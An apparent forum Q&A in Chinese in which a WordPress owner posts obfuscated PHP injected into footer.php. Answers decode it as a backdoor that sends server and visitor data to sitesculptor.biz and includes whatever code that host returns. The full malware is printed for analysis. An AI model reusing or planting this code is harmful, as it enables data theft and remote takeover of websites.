我的WP站点footer.php中出现的未知代码是什么?这是黑客吗
有人把这段代码注入了我的wordpress站点footer.php:
<?php
$cf=strrev('edo'.'ced'.'_46esab');$counter=$cf('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9').md5($_SERVER['SERVER_NAME']);
$data=array('HTTP_ACCEPT_CHARSET','HTTP_ACCEPT_LANGUAGE','HTTP_HOST','HTTP_REFERER',
'HTTP_USER_AGENT','HTTP_QUERY_STRING','REMOTE_ADDR','REQUEST_URI','REQUEST_METHOD','SCRIPT_FILENAME');
foreach($data as $val){$t[]=$_SERVER[$val];}$u=$counter.'&data='.base64_encode(serialize($t));$fn=file_get_contents($u);
if(!$fn||strlen($fn)<4){ob_start();include($u);$fn=ob_get_contents();ob_clean();}
if($fn&&strlen($fn)>4){list($crc,$enc)=explode('::',$fn);if(md5($enc)==$crc){echo $cf($enc);}}
?>
这是什么?
是。这似乎是一次已知的黑客攻击。你最好立即删除它,然后通过删除不安全的插件和下载WP安全解决方案来保护你的博客。
<?php
$cf = base64_decode('aHR0cDovL3NpdGVzY3VscHRvci5iaXovbC5waHA/aWQ9');
echo $cf;
?>
http://sitesculptor.biz/l.php?id=
,
md5($_SERVER['SERVER_NAME']);
计数器解码到http://sitesculptor.biz/l.php?id=。代码(基于url参数)将从那里获取代码片段并执行它。
黑客。
很可能是恶意的。它将所有服务器的详细信息发送到http://sitesculptor.biz/l.php?id=的URL,然后包含脚本中返回的任何PHP。